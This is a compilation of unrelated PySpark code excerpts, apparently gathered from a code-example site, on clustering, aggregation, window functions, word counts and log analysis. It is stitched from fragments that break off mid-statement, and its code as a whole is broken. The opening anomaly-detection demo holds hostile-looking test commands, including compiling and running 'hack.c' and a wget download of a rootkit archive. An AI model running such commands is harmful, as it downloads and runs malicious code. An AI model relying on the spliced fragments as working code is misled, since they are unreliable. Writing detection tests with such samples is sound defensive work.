kmeans = KMeans(k=650, seed=42, featuresCol="features", predictionCol="prediction", maxIter=10, initSteps=3)
kmodel = kmeans.fit(df)

#test = kmodel.transform(featuresOut)

'''
########## DEMO #########
'''
df.groupBy(df.prediction).count().orderBy(asc('count')).show(50)
groups = df.groupBy(df.prediction.alias("prediction2")).count().orderBy(asc('count')).filter('count < 40')
df.join(groups, groups.prediction2==df.prediction).select('command','prediction').distinct().show()
df.join(groups, groups.prediction2==df.prediction).select('command').distinct().show(500,truncate=False)

groups = df.groupBy(df.prediction.alias("prediction2")).count().orderBy(desc('count')).filter('count > 100000')
df.join(groups, groups.prediction2==df.prediction).select('command').distinct().show(500,truncate=False)


groups = sc.parallelize(df.groupBy(df.prediction.alias("prediction2")).count().orderBy(desc('count')).head(10)).toDF()
df.join(groups, groups.prediction2==df.prediction).select('command').distinct().show(50,truncate=False)

# Create a new DF with some weird commands
test1 = ctx.createDataFrame([
], ["command"])

test2 = ctx.createDataFrame([
  ("gcc hack.c -o hack;./hack".split(" "),"2015-12-07","root","msr-telemetry-cass06","msr-dev-nsw-o01","sn-discovery-unix",),
  ("wget http://wwww.my.com/rootkit.gz".split(" "),"2015-12-07","root","msr-telemetry-cass06","msr-dev-nsw","sn-discovery-unix", ),
  ("echo, $?".split(" "),"2015-12-07","root","msr-telemetry-cass06","msr-dev-nsw-o01.domain.org","sn-discovery-unix", ),
  ("asdjgiuarsjhgiurewhgjui asdadfsadf sdf".split(" "),"2015-12-07","root","msr-telemetry-cass06","","sn-discovery-unix", ),
# Example 30
DataFrame[emp_id: bigint, emp_name: string, emp_city: string, emp_salary: double]
>>> old_df.unionAll(new_df).show()
+------+--------+---------+----------+
|emp_id|emp_name| emp_city|emp_salary|
+------+--------+---------+----------+
|     1|    John|   Sydney|   35000.0|
|     2|   Peter|Melbourne|   45000.0|
|     3|     Sam|   Sydney|   55000.0|
|     2|   Peter|Melbourne|   55000.0|
|     5|  Jessie| Brisbane|   42000.0|
+------+--------+---------+----------+

>>> union_df=old_df.unionAll(new_df)
>>> from pyspark.sql import Window

window_agg=Window.partitionBy("emp_id").orderBy(F.desc("emp_salary"))


>>> union_df.select(F.row_number().over(window_agg).alias("rn"),"*").filter("rn=1").select(new_df.columns).orderBy("emp_id").show()
+------+--------+---------+----------+
|emp_id|emp_name| emp_city|emp_salary|
+------+--------+---------+----------+
|     1|    John|   Sydney|   35000.0|
|     2|   Peter|Melbourne|   55000.0|
|     3|     Sam|   Sydney|   55000.0|
|     5|  Jessie| Brisbane|   42000.0|
+------+--------+---------+----------+



===================================================================================================================================
def words_relevance(words_specific_df, sqlContext, high_type='all'):
    '''
    words_specific_df : target words for which to compute relevance, as a pandas dataframe
    '''
    if high_type == 'all':
        words_specific_df = None
    coef_col_name = ''
    storage_table1 = '{0}.effect_words_relevance_product_name'.format(
        database_name)
    storage_table2 = '{0}.effect_words_relevance_in_each_product_name'.format(
        database_name)
    # 1 extract word column
    if words_specific_df is not None:
        target_word_df = words_specific_df[['word']].copy()
    else:
        target_word_df = None
    # 2 get word-comments_ cut result
    idx_name = 'product_id'
    doc_table = params['shared']['doc_cut_word_table']
    comments_words_new = sqlContext.sql(
        "select product_id as {0},cut_word_flag as comments_words_new from {1}.{2}"
        .format(idx_name, database_name, doc_table))

    # 3 calculate relevance in each comment
    def words_relevance_one_comment(comment_split_words,
                                    target_word_df=target_word_df):
        '''
        Compute the contextual relevance between the target words and words with effective POS tags within a single review sentence.
        When target_word_df is not supplied, compute the contextual relevance between every pair of words in the sentence (the current default).
        Example of a single review: comment_split_words=[{'word':'不用','flag':'v'},{'word':'担心','flag':'v'},{'word':'简约','flag':'a'},{'word':'时尚','flag':'an'},{'word':'拿着','flag':'vu'},{'word':'质量','flag':'n'}]
        return relevance_in_each_comment: the word relevance within each sentence
        '''
        if type(comment_split_words) == type(sp_row()):
            idx = comment_split_words[idx_name]
            comment_split_words = comment_split_words['comments_words_new']
        effect_flag_weight = pds.DataFrame([('n', 1), ('ns', 1), ('nt', 1),
                                            ('nr', 0.5), ('nz', 0.67),
                                            ('nv', 0.67), ('vn', 0.67),
                                            ('an', 0.67)],
                                           columns=['flag', 'weight'])
        if len(comment_split_words) > 0:
            comment_words_df = pds.DataFrame(comment_split_words)

            if target_word_df is not None:
                comment_words_df = comment_words_df.loc[
                    (comment_words_df.word.isin(target_word_df.word)) |
                    (comment_words_df.flag.isin(effect_flag_weight.flag)
                     ), :].reset_index().rename(columns={'index': 'position'})
                flag_words = pds.merge(comment_words_df,
                                       effect_flag_weight,
                                       on='flag',
                                       how='inner',
                                       sort=False).rename(
                                           columns={
                                               'position': 'flag_pos',
                                               'flag': 'flag_flag',
                                               'word': 'flag_word'
                                           })
                target_words = pds.merge(comment_words_df,
                                         target_word_df,
                                         on='word',
                                         how='inner',
                                         sort=False).rename(
                                             columns={
                                                 'position': 'target_pos',
                                                 'flag': 'target_flag',
                                                 'word': 'target_word'
                                             })
            else:
                comment_words_df = comment_words_df.reset_index().rename(
                    columns={'index': 'position'})
                flag_words = comment_words_df.copy()
                flag_words['weight'] = 1.0
                flag_words.rename(columns={
                    'position': 'flag_pos',
                    'flag': 'flag_flag',
                    'word': 'flag_word'
                },
                                  inplace=True)
                target_words = comment_words_df.copy()
                target_words.rename(columns={
                    'position': 'target_pos',
                    'flag': 'target_flag',
                    'word': 'target_word'
                },
                                    inplace=True)
            if flag_words.shape[0] > 0 and target_words.shape[0] > 0:
                # Cartesian product of the target-word and effective-word dataframes
                flag_words['dikar_id'] = 0
                target_words['dikar_id'] = 0
                merge_df = pds.merge(flag_words, target_words, on='dikar_id')
                # tip: when a word is compared with itself, add 0.9 first to avoid producing inf
                merge_df.loc[merge_df.flag_pos == merge_df.target_pos,
                             'target_pos'] = merge_df.loc[merge_df.flag_pos ==
                                                          merge_df.target_pos,
                                                          'target_pos'] + 0.9
                merge_df['pos_diff'] = npy.abs(merge_df.flag_pos -
                                               merge_df.target_pos)
                merge_df['each_relevance'] = merge_df.weight / (npy.power(
                    merge_df.pos_diff,
                    merge_df.pos_diff / 2.0))  # make the context-distance decay accelerate as the distance grows
                # Within one sentence a (target word, effective word) pair keeps a single relevance value; when duplicates exist, take the maximum within that sentence.
                merge_df_group = merge_df.groupby(
                    ['flag_word',
                     'target_word'])['each_relevance'].max().reset_index()
                merge_df = merge_df.drop_duplicates(
                    subset=['flag_word', 'target_word'])[[
                        'flag_word', 'target_word', 'flag_flag', 'target_flag'
                    ]]
                merge_df_group = pds.merge(merge_df_group.copy(),
                                           merge_df,
                                           on=['flag_word', 'target_word'])
                merge_df_group[idx_name] = idx
                relevance_in_each_comment = merge_df_group.values.tolist()
            else:
                relevance_in_each_comment = []
        else:
            relevance_in_each_comment = []
        return relevance_in_each_comment

    relevance_in_each_comment = comments_words_new.rdd.flatMap(
        words_relevance_one_comment)  #
    relevance_in_each_comment_df = sqlContext.createDataFrame(
        relevance_in_each_comment, [
            'flag_word', 'target_word', 'each_relevance', 'flag_flag',
            'target_flag', idx_name
        ])
    #relevance_in_each_comment_df.persist(StorageLevel(True,True,False,False,1))
    #no_out=sqlContext.sql('drop table if exists {0}'.format(storage_table2)).collect()
    relevance_in_each_comment_df.write.saveAsTable(
        '{0}'.format(storage_table2), mode='overwrite')  # fast with 80 executors
    relevance_in_each_comment_df = sqlContext.sql(
        'select * from {0}'.format(storage_table2))
    # 4 calculate summary_relevance
    effect_words_relevance_tem = relevance_in_each_comment_df.groupBy(
        ['flag_word', 'target_word']).agg(F.sum('each_relevance'),
                                          F.count('each_relevance'),
                                          F.avg('each_relevance'))
    effect_words_relevance_tem = effect_words_relevance_tem.withColumnRenamed(
        'sum(each_relevance)', 'sum_relevance').withColumnRenamed(
            'count(each_relevance)',
            'total_comment_num').withColumnRenamed('avg(each_relevance)',
                                                   'avg_relevance')
    effect_words_relevance = effect_words_relevance_tem.withColumn(
        'final_relevance_coef',
        F.pow(effect_words_relevance_tem.sum_relevance, 2) /
        effect_words_relevance_tem.total_comment_num)
    # 4.2 rank in partition
    windw = Window.partitionBy('flag_word').orderBy(
        F.desc('final_relevance_coef'))
    effect_words_relevance = effect_words_relevance.select(
        '*',
        F.rank().over(windw).alias('rank_in_flag_word'))
    # 4.3 append word_flag
    words_flag_tem = relevance_in_each_comment_df.drop_duplicates(
        ['flag_word', 'target_word']).select('flag_word', 'target_word',
                                             'flag_flag', 'target_flag')
    effect_words_relevance = effect_words_relevance.join(
        words_flag_tem, ['flag_word', 'target_word'])
    # 4.4 append target word emo_promote_coef
    if high_type != 'all':
        words_specific_df = sqlContext.createDataFrame(words_specific_df)
        effect_words_relevance = effect_words_relevance.join(
            words_specific_df, effect_words_relevance.target_word ==
            words_specific_df.word).select(
                'flag_word', 'target_word', 'flag_flag', 'target_flag',
                'sum_relevance', 'total_comment_num', 'avg_relevance',
                'final_relevance_coef', 'rank_in_flag_word', coef_col_name)
    else:
        effect_words_relevance = effect_words_relevance.select(
            'flag_word', 'target_word', 'flag_flag', 'target_flag',
            'sum_relevance', 'total_comment_num', 'avg_relevance',
            'final_relevance_coef', 'rank_in_flag_word')
    #effect_words_relevance.persist(StorageLevel(True,True,False,False,1))
    #no_out=sqlContext.sql('drop table if exists {0}'.format(storage_table1)).collect()
    effect_words_relevance.write.saveAsTable('{0}'.format(storage_table1),
                                             mode='overwrite')
    return 'effect_words_relevance run over'
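# Hypothetical invocation sketch: with high_type='all' the target-word dataframe is
# ignored and pairwise relevance is computed over all words; `sqlContext`, `params`
# and `database_name` are assumed to be configured elsewhere.
#   words_relevance(None, sqlContext, high_type='all')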
# Process Data using pyspark.sql
# Set the Hadoop configuration.

# In[8]:

# Python expressions in a code cell will be outputted after computation
expenditures_df.printSchema()


# In[9]:

# Sorting the data using spark sql
from pyspark.sql.functions import desc, asc

factor = expenditures_df.sort(desc('(% OF GDP)')).limit(10).toPandas()
factor_re = expenditures_df.sort(asc('(% OF GDP)')).limit(10).toPandas()


# In[10]:

print factor


# In[11]:

life = life_expectancy_df.sort(desc('(YEARS)')).limit(10).toPandas()
life_re = life_expectancy_df.sort(asc('(YEARS)')).limit(10).toPandas()


# In[12]:
 def question_one(self):
     self.rawDF.withColumn("raised_funds", self.money_to_int("raised_funds"))\
               .groupBy("sweets")\
               .agg(f.sum("raised_funds").alias("total_funds"))\
               .orderBy(f.desc("total_funds"))\
               .show(10, False)
    df = spark.createDataFrame([], original_schema)
    text = row.ctext
    newRow = spark.createDataFrame([(text, text)], cols)
    df = df.union(newRow)
    #df = df.withColumnRenamed("ctext\r","ctext")
    sentencesDF = df.select(explode(split(df.ctext, "\.")).alias("sentences"))
    sentencesDF = sentencesDF.na.drop()
    tokenized = tokenize(sentencesDF)
    edited = stopwords_removal(tokenized)
    edgelist = createEdges(edited)
    edgeData = sc.parallelize(edgelist)
    schema = StructType([
        StructField("src", StringType(), True),
        StructField("dst", StringType(), True),
        StructField("score", FloatType(), True)
    ])
    edgeDF = spark.createDataFrame(edgeData, schema)
    vertices = edited.withColumnRenamed("sentences", "id")
    gFrame = GraphFrame(vertices, edgeDF)
    ranks = gFrame.pageRank(resetProbability=0.5, maxIter=20)
    sorted_ranks = ranks.vertices.orderBy(desc("pagerank")).limit(5)
    sentence_final = ""
    for srow in sorted_ranks.collect():
        sentence_final = sentence_final + srow.id + "."

    final_df_row = spark.createDataFrame([(text, sentence_final)], cols)
    final_df = final_df.union(final_df_row)

final_df.repartition(1).write.csv(
    "s3://project.summary/output.prob.05.max.20/.csv")
print("End of Summarization")
# Example 35
                            postgres_user).option("password",
                                                  postgres_pwd).load())

df_ratings = (spark.read.format("jdbc").option("url", postgres_db).option(
    "dbtable",
    "public.ratings").option("user",
                             postgres_user).option("password",
                                                   postgres_pwd).load())

####################################
# Top 10 movies with the most ratings
####################################
df_movies = df_movies.alias("m")
df_ratings = df_ratings.alias("r")

df_join = df_ratings.join(df_movies,
                          df_ratings.movieId == df_movies.movieId).select(
                              "r.*", "m.title")

df_result = (df_join.groupBy("title").agg(
    F.count("timestamp").alias("qty_ratings"),
    F.mean("rating").alias("avg_rating")).sort(
        F.desc("qty_ratings")).limit(10))

print("######################################")
print("EXECUTING QUERY AND SAVING RESULTS")
print("######################################")
# Save result to a CSV file
df_result.coalesce(1).write.format("csv").mode("overwrite").save(
    "/usr/local/spark/resources/data/output_postgres", header=True)
# Example 36
    (unix_timestamp(max("data_timestamp").over(window_sessions)) -
     unix_timestamp(min("data_timestamp").over(window_sessions))) / 60)

df.groupBy("client_ip").count().show()

# This is the sample IP address that I used to create the queries.
test = df.orderBy("client_ip",
                  "data_timestamp").where("client_ip = '156.101.9.1'")
test2 = test.withColumn("prev_time",
                        lag(test.data_timestamp).over(window_clients))
test3 = test2.withColumn(
    "session",
    sum((coalesce(
        (unix_timestamp("data_timestamp") - unix_timestamp("prev_time")) / 60,
        lit(0)) > 15).cast("int")).over(window_clients))
test3.withColumn(
    "total_session_time",
    (unix_timestamp(max("data_timestamp").over(window_sessions)) -
     unix_timestamp(min("data_timestamp").over(window_sessions))) / 60)
test3.select("client_ip", "session",
             "request_url").distinct().groupBy("request_url").count().show()

# This is the query to get the average session time.
df.select(avg("total_session_time")).show()
# This is the query to get the most engaged users.
df.select("client_ip", "total_session_time").distinct().orderBy(
    desc("total_session_time")).show()
# This is the query to get the unique URL visits per session
df.select("client_ip", "session",
          "request_url").distinct().groupBy("request_url").count().show()
df.groupBy("state").sum("salary").show()

dfGroup=df.groupBy("state") \
          .agg(sum("salary").alias("sum_salary"))

dfGroup.show(truncate=False)

dfFilter = dfGroup.filter(dfGroup.sum_salary > 100000)
dfFilter.show()

from pyspark.sql.functions import asc
dfFilter.sort("sum_salary").show()

from pyspark.sql.functions import desc
dfFilter.sort(desc("sum_salary")).show()

df.groupBy("state") \
  .agg(sum("salary").alias("sum_salary")) \
  .filter(col("sum_salary") > 100000)  \
  .sort(desc("sum_salary")) \
  .show()

df.createOrReplaceTempView("EMP")
spark.sql("select state, sum(salary) as sum_salary from EMP " +
          "group by state having sum_salary > 100000 " +
          "order by sum_salary desc").show()

df.groupBy("state") \
  .sum("salary") \
  .withColumnRenamed("sum(salary)", "sum_salary") \
# Example 38
aggdf = spark.read.format("csv").option("header", "true").option("inferSchema", "true").load("dbfs:/FileStore/tables/retail_data_all-db128.txt").coalesce(5)

aggdf.cache()

aggdf.createOrReplaceTempView("aggtable")
#aggdf.show(10)

#from pyspark.sql.functions import distinct
aggdf.select("InvoiceNo").distinct().count()

from pyspark.sql.functions import countDistinct, approx_count_distinct, col
aggdf.select(countDistinct(col("StockCode"))).show()

from pyspark.sql.functions import first, last, desc
aggdf.orderBy(desc("UnitPrice")).show()

from pyspark.sql.functions import sum, count, avg, expr
aggdf.select(
count("Quantity").alias("total_transactions"),
sum("Quantity").alias("total_purchases"),
avg("Quantity").alias("avg_purchases"),
expr("mean(Quantity)").alias("mean_purchases"))\
.selectExpr(
"total_purchases/total_transactions",
"avg_purchases",
"mean_purchases").show()

from pyspark.sql.functions import collect_set, collect_list
aggdf.agg(collect_set("Description"), collect_list("Description")).show()

from pyspark.sql.window import Window
# Example 39
from pyspark.context import SparkContext

# In[2]:
from config import datalake_features_path, datalake_staged_path, daily_feature_countries

# In[3]:
spark = SparkSession.builder.appName('covid_daily_feature').getOrCreate()

# In[4]:
df = (spark.read.option("header", "true").option(
    "inferSchema", "true").load(datalake_staged_path + "/full"))

# In[5]:
df = (
    df.filter((col("country_region").isin(daily_feature_countries))).filter(
        col("province_state") == "n/a").orderBy(desc("date"))
    # Two days for 2 countries
    .limit(2 * 2))

# In[6]:
window = Window.partitionBy("country_region").orderBy("date")

df_lag = (df.withColumn('prev_confirmed',
                        lag(col('confirmed')).over(window)).withColumn(
                            'prev_deaths',
                            lag(col('deaths')).over(window)).withColumn(
                                'prev_recovered',
                                lag(col('recovered')).over(window)))

result = (df_lag.withColumn(
    'new_confirmed',
# Example 40
    partial(histogram, bins=np.logspace(0, 32, 33, base=2)),
    ArrayType(LongType()),
    F.PandasUDFType.GROUPED_AGG,
)
hist_l_count = F.pandas_udf(
    partial(histogram, bins=np.logspace(0, 25, 26, base=2)),
    ArrayType(LongType()),
    F.PandasUDFType.GROUPED_AGG,
)
hist_d_count = F.pandas_udf(
    partial(histogram, bins=np.logspace(0, 25, 26, base=2)),
    ArrayType(LongType()),
    F.PandasUDFType.GROUPED_AGG,
)

w = Window().partitionBy("date", "categories").orderBy(F.desc("view_count"))
top_v = (
    scaled.withColumn("date", F.date_trunc("week", "upload_date")).select(
        "date",
        "upload_date",
        "categories",
        "display_id",
        "view_count",
        "like_count",
        "dislike_count",
        "duration",
        ((F.col("like_count") + F.col("dislike_count")) /
         F.col("view_count")).alias("engagement_score"),
        F.rank().over(w).alias("rank"),
    ).filter("rank <= 20").drop("rank")
    # .groupBy("date", "categories")
# Example 41
for center in centers:
    print(center)

# Predict the label of each hacking attempt
    
Final_Model_LocationCoded.transform(FinalData_LocationCoded).select('prediction').show(10)


# In[6]:

#formingClusters

#Without Location

clusters_NoLocation = Final_Model_NoLocation.transform(FinalData_NoLocation).select('*')
clusters_NoLocation.groupBy("prediction").count().orderBy(F.desc("count")).show()
clusters_NoLocation.show()
clusters_NoLocation_pd = clusters_NoLocation.toPandas()
clusters_NoLocation_pd.to_csv("Clusters_NoLocation.csv")

#With LocationIndex

clusters_LocationIndex = Final_Model_LocationIndex.transform(FinalData_LocationIndex).select('*')
clusters_LocationIndex.groupBy("prediction").count().orderBy(F.desc("count")).show()
clusters_LocationIndex.show()
clusters_LocationIndex_pd = clusters_LocationIndex.toPandas()
clusters_LocationIndex_pd.to_csv("clusters_LocationIndex.csv")

#With LocationCoded

clusters_LocationCoded = Final_Model_LocationCoded.transform(FinalData_LocationCoded).select('*')
def bar_plot(df_in,
             top_n=20,
             rotation=True,
             output_dir=None,
             display=False,
             tracking=False):
    """
    Bar plot for the categorical features in the rdd data frame.

    :param df_in: the input rdd data frame
    :param top_n: the number of the most frequent feature to show in the bar plot
    :param rotation: the flag for rotating the xticks in the plot, the default value is True
    :param output_dir: the output directory, the default value is the current working directory
    :param display: the flag for displaying the figures, the default value is False
    :param tracking: the flag for displaying CPU time, the default value is False
    """
    _, _, cat_fields, date_fields, _ = dtypes_class(df_in)

    cat_fields = cat_fields + date_fields
    if cat_fields:
        df_in = df_in.select(cat_fields)

        if output_dir is None:
            out_path = os.getcwd() + '/Audited'
        else:
            out_path = output_dir + '/Audited'
        mkdir(out_path)

        print(
            '================================================================')
        print('The bar plot file 03-Bar_plots.pdf is located at:')
        print(out_path)
        if tracking:
            start = time.time()

        pdf = PdfPages(out_path + '/03-Bar_plots.pdf')
        for col in df_in.columns:
            p_data = df_in.select(col).na.drop().groupBy(col).count().sort(
                F.desc('count')).limit(top_n).toPandas()

            if tracking:
                print('Plotting barplot of {}.... Please be patient!'.format(
                    col))
            plt.ioff()
            fig = plt.figure(figsize=(20, 15))
            sns.barplot(x=col, y="count", data=p_data)
            plt.title('Barplot of {}'.format(col), fontsize=20)
            plt.xlabel('{}'.format(col), fontsize=20)
            plt.ylabel('number of counts', fontsize=20)
            if rotation:
                plt.xticks(rotation=90)
            pdf.savefig(fig)
            if display:
                plt.show()
            plt.close(fig)
        if tracking:
            print('Bar plots are DONE!!!')
        pdf.close()

        if tracking:
            end = time.time()
            print('Generate bar plots took = ' + str(end - start) + ' s')
    else:
        print('Caution: no categorical features in the dataset!!!')
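# A minimal usage sketch for bar_plot; the DataFrame name and output path below
# are assumptions for illustration, not part of the original snippet:
#
#     bar_plot(df_audit, top_n=10, rotation=True,
#              output_dir='/tmp/audit_report', display=False, tracking=True)
#
# This writes 03-Bar_plots.pdf, with one bar chart per categorical/date column,
# under /tmp/audit_report/Audited.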
Example #43
# How many users are female?
# TODO: write your code to answer question 3
females = user_log.filter(user_log.gender == 'F') \
    .select('userId', 'gender') \
    .dropDuplicates() \
    .count()
print(f'Female users: {females}\n')

########################## Question 4 ##########################
# How many songs were played from the most played artist?
# TODO: write your code to answer question 4
user_log.filter(user_log.page == 'NextSong') \
    .select('Artist') \
    .groupBy('Artist') \
    .agg({'Artist' : 'count'}) \
    .sort(desc('count(Artist)')) \
    .withColumnRenamed('count(Artist)', 'Play_count') \
    .show(1)

########################## Question 5 (challenge) ##########################
# How many songs do users listen to on average between visiting our home page? Round to the closest integer
function = udf(lambda ishome: int(ishome == 'Home'), IntegerType())

user_window = Window \
    .partitionBy('userID') \
    .orderBy(desc('ts')) \
    .rangeBetween(Window.unboundedPreceding, 0)

cusum = user_log.filter((user_log.page == 'NextSong') | (user_log.page == 'Home')) \
    .select('userID', 'page', 'ts') \
    .withColumn('homevisit', function('page')) \
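# The chained expression above is cut off in this excerpt. A hedged sketch of
# how the cumulative-sum approach is typically finished (the names `Fsum` and
# `cusum` and the exact steps are assumptions, not necessarily the original
# code): mark each Home visit, build a running count of visits per user to
# label listening periods, then average the number of songs per period.
from pyspark.sql.functions import sum as Fsum

cusum = user_log.filter((user_log.page == 'NextSong') | (user_log.page == 'Home')) \
    .select('userID', 'page', 'ts') \
    .withColumn('homevisit', function('page')) \
    .withColumn('period', Fsum('homevisit').over(user_window))

cusum.filter(cusum.page == 'NextSong') \
    .groupBy('userID', 'period') \
    .agg({'period': 'count'}) \
    .agg({'count(period)': 'avg'}) \
    .show()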
Example #44
p_temp = part.filter("p_name like '%dim%'")
s_l = lineitem.join(supplier,lineitem.L_SUPPKEY == supplier.S_SUPPKEY)
s_l_ps = s_l.join(partsupp, (s_l.L_SUPPKEY == partsupp.PS_SUPPKEY) & (s_l.L_PARTKEY == partsupp.PS_PARTKEY))
s_l_ps_p = s_l_ps.join(part,s_l_ps.PS_PARTKEY == part.P_PARTKEY)
s_l_ps_p_o = s_l_ps_p.join(orders, s_l_ps_p.L_ORDERKEY == orders.O_ORDERKEY)
s_l_ps_p_o_n = s_l_ps_p_o.join(nation,s_l_ps_p_o.S_NATIONKEY == nation.N_NATIONKEY)
profit = s_l_ps_p_o_n \
    .select(s_l_ps_p_o_n.N_NAME.alias("NATION"),
            F.year(s_l_ps_p_o_n.O_ORDERDATE).alias("O_YEAR"),
            (s_l_ps_p_o_n.L_EXTENDEDPRICE * (1 - s_l_ps_p_o_n.L_DISCOUNT) - s_l_ps_p_o_n.PS_SUPPLYCOST * s_l_ps_p_o_n.L_QUANTITY).alias("AMOUNT"))

res = profit \
    .select(profit.NATION, profit.AMOUNT, profit.O_YEAR) \
    .groupBy(profit.NATION, profit.O_YEAR) \
    .agg(F.sum(profit.AMOUNT).alias("SUM_PROFIT")) \
    .orderBy(profit.NATION, F.desc("O_YEAR"))

p_temp = part.filter("p_name like '%dim%'")
l_p = p_temp.join(lineitem, p_temp.P_PARTKEY == lineitem.L_PARTKEY)
n_s = nation.join(supplier,nation.N_NATIONKEY == supplier.S_NATIONKEY)
l_p_s = l_p.join(n_s,l_p.L_SUPPKEY == n_s.S_SUPPKEY)
l_p_s_ps = l_p_s.join(partsupp,l_p_s.L_SUPPKEY == partsupp.PS_SUPPKEY)
l_p_s_ps_o = l_p_s_ps.join(orders,l_p_s_ps.L_ORDERKEY == orders.O_ORDERKEY)

profit = l_p_s_ps_o.select(l_p_s_ps_o.N_NAME,F.year(l_p_s_ps_o.O_ORDERDATE).alias("O_YEAR"),(l_p_s_ps_o.L_EXTENDEDPRICE * (1 - l_p_s_ps_o.L_DISCOUNT) - l_p_s_ps_o.PS_SUPPLYCOST * l_p_s_ps_o.L_QUANTITY).alias("AMOUNT"))

res = profit \
    .groupBy(profit.N_NAME, profit.O_YEAR) \
    .agg(F.sum(profit.AMOUNT).alias("SUM_PROFIT")) \
    .orderBy(profit.N_NAME, F.desc("O_YEAR"))
# MAGIC %md ## Window functions ##

# COMMAND ----------

#Add a new date column
spark.sql("set spark.sql.legacy.timeParserPolicy=LEGACY")
from pyspark.sql.functions import col, to_date, desc, max, dense_rank
from pyspark.sql.window import Window
dfWithDate = df.withColumn("date", to_date(col("InvoiceDate"),
                                           "MM/d/yyyy H:mm"))

#1 define a window - use all preceding rows up and until current row
windowSpec = Window\
            .partitionBy("CustomerID","date")\
            .orderBy(desc("Quantity"))\
            .rowsBetween(Window.unboundedPreceding, Window.currentRow)
#2 define aggregation maxPurchaseQuantity
maxPurchaseQuantity = max(col("Quantity")).over(windowSpec)
print(maxPurchaseQuantity)

#2.1 purchaseRank
purchaseDenseRank = dense_rank().over(windowSpec)
print(purchaseDenseRank)

# COMMAND ----------

# 3 Perform a Select
dfWithDate.where("CustomerId IS NOT NULL").orderBy("CustomerId")\
.select(
    col("CustomerId"),
Example #46
adlocation.printSchema()
adlocation.cache()

vpn = ctx.read.load('/user/cloudera/ciscovpn')
vpn.printSchema()
vpn.cache()

def func(x):
    gi = GeoIP.open("GeoIP.dat",GeoIP.GEOIP_MEMORY_CACHE)
    cc = gi.country_code_by_addr(x.remoteip)
    return Row(bytesrcv=x.bytesrcv, bytesxmt=x.bytesxmt, duration=x.duration, localip=x.localip, reason=x.reason,
               remoteip=x.remoteip, source=x.source, time=x.time, user=x.user, date=x.date, remoteipcc=cc)

vpnDF = vpn.map(func).toDF()
joinDF = vpnDF.join(adlocation, vpnDF.user == adlocation.EmailAddress)
joinDF.cache()

fromOtherLocations = joinDF.filter("remoteipcc <> c")
cntLoginExtLocation = fromOtherLocations.count()

groupDF = fromOtherLocations.groupBy(fromOtherLocations.user, fromOtherLocations.remoteip, fromOtherLocations.remoteipcc, fromOtherLocations.c)\
    .count()\
    .orderBy(desc('count'))

groupDF.cache()

countbyCountry = fromOtherLocations.groupBy(groupDF.user, groupDF.remoteipcc).count().orderBy(desc('count'))


Example #47
# MAGIC %md
# MAGIC For your final task, you'll group by word and count the number of times each word occurs.  Make sure to return the counts in descending order and to call them `counts`.
# MAGIC  
# MAGIC For this task, you can use:
# MAGIC  * `DataFrame` operations `groupBy`, `agg`, and `sort`
# MAGIC  * the `Column` operation `alias`
# MAGIC  * functions `func.count` and `func.desc`.

# COMMAND ----------

# ANSWER
wordGroupCount = (wordList
                  .groupBy('word')  # group
                  .agg(func.count('word').alias('counts'))  # aggregate
                  .sort(func.desc('counts')))  #sort

wordGroupCount.take(5)

# COMMAND ----------

# TEST
Test.assertEquals(tuple(wordGroupCount.first()), (u'ref', 29263), 'incorrect counts.')

# COMMAND ----------

# MAGIC %md
# MAGIC We could also use SQL to accomplish this counting.

# COMMAND ----------
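# The SQL cell itself is not part of this excerpt. A hedged sketch of the
# equivalent query; the temp-view name 'word_list' and the availability of
# `sqlContext` in the notebook are assumptions:
wordList.createOrReplaceTempView('word_list')
wordGroupCountSQL = sqlContext.sql(
    "SELECT word, count(*) AS counts FROM word_list "
    "GROUP BY word ORDER BY counts DESC")
wordGroupCountSQL.take(5)

# COMMAND ----------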
#!/usr/bin/python

from pyspark import SparkContext
from pyspark.sql import SQLContext, Row
from pyspark.sql.functions import asc, desc

if __name__ == "__main__":
  sc = SparkContext(appName='resort data')
  sqlContext = SQLContext(sc)

  df = sqlContext.read.load('hdfs://discovery3:9000/tmp/dasmith/c19-20160919-a50-o08/pretty.parquet')
  #df = sqlContext.read.load('hdfs://discovery3:9000/tmp/dasmith/c19-20160402-a50-o08/out.parquet')
  df.registerTempTable("newspaper")
  df2 = sqlContext.sql("select series, date, count(*) as cnt from newspaper group by series, date order by cnt desc")
  df3 = df.join(df2, ['series', 'date'])
  df3.sort(desc("cnt"), asc("begin"), asc("end"))\
     .write.json('/gss_gpfs_scratch/xu.shao/network/resorted-pretty.json')
###############################################################
###															###
###															###
###   						SORT and ORDER					###
###															###
###															###
############################################################### 

# Get the five oldest people in the list. To do that, sort by age in descending order using orderBy transformation
orderdataDF = dataDF.orderBy(dataDF.age.desc())
display(orderdataDF.take(5))

# desc() order correct/alternate format
from pyspark.sql.functions import desc
WordsAndCountsDF = wordCount(shakeWordsDF)
topWordsAndCountsDF = WordsAndCountsDF.orderBy(desc("count"))
topWordsAndCountsDF.show()

# for ascending order
orderdataDF = dataDF.orderBy(dataDF.age)
display(orderdataDF.take(5))

# SORT operation
new_sorted_df = (original_df.groupBy('somecolumn').count().sort('somecolumn',ascending=False).cache())
Sorted_df = OriginalDF.select('A_Column').groupBy('A_Column').count().sort('count', ascending=False) # Sorting by 'A_Column'

###############################################################
###															###
###															###
###   				CACHING AND STORAGE						###
###															###
Example #50
# MAGIC %md
# MAGIC ** (4e) Count the words **
# MAGIC 
# MAGIC We now have a DataFrame that is only words.  Next, let's apply the `wordCount()` function to produce a list of word counts. We can view the first 20 words by using the `show()` action; however, we'd like to see the words in descending order of count, so we'll need to apply the [`orderBy` DataFrame method](http://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.DataFrame.orderBy) to first sort the DataFrame that is returned from `wordCount()`.
# MAGIC 
# MAGIC You'll notice that many of the words are common English words. These are called stopwords. In a later lab, we will see how to eliminate them from the results.

# COMMAND ----------

# TODO: Replace <FILL IN> with appropriate code
from pyspark.sql.functions import desc
topWordsAndCountsDF = (shakeWordsDF
                       .groupBy(shakeWordsDF.word)
                       .count()
                       .orderBy(desc('count'))
                      )
topWordsAndCountsDF.show()

# COMMAND ----------

# TEST Count the words (4e)
Test.assertEquals(topWordsAndCountsDF.take(15),
                  [(u'the', 27361), (u'and', 26028), (u'i', 20681), (u'to', 19150), (u'of', 17463),
                   (u'a', 14593), (u'you', 13615), (u'my', 12481), (u'in', 10956), (u'that', 10890),
                   (u'is', 9134), (u'not', 8497), (u'with', 7771), (u'me', 7769), (u'it', 7678)],
                  'incorrect value for top15WordsAndCountsDF')

# COMMAND ----------

# MAGIC %md
    def _calculate_rate(instance_usage_df):
        instance_usage_data_json_list = []

        try:
            sorted_oldest_ascending_df = instance_usage_df.sort(
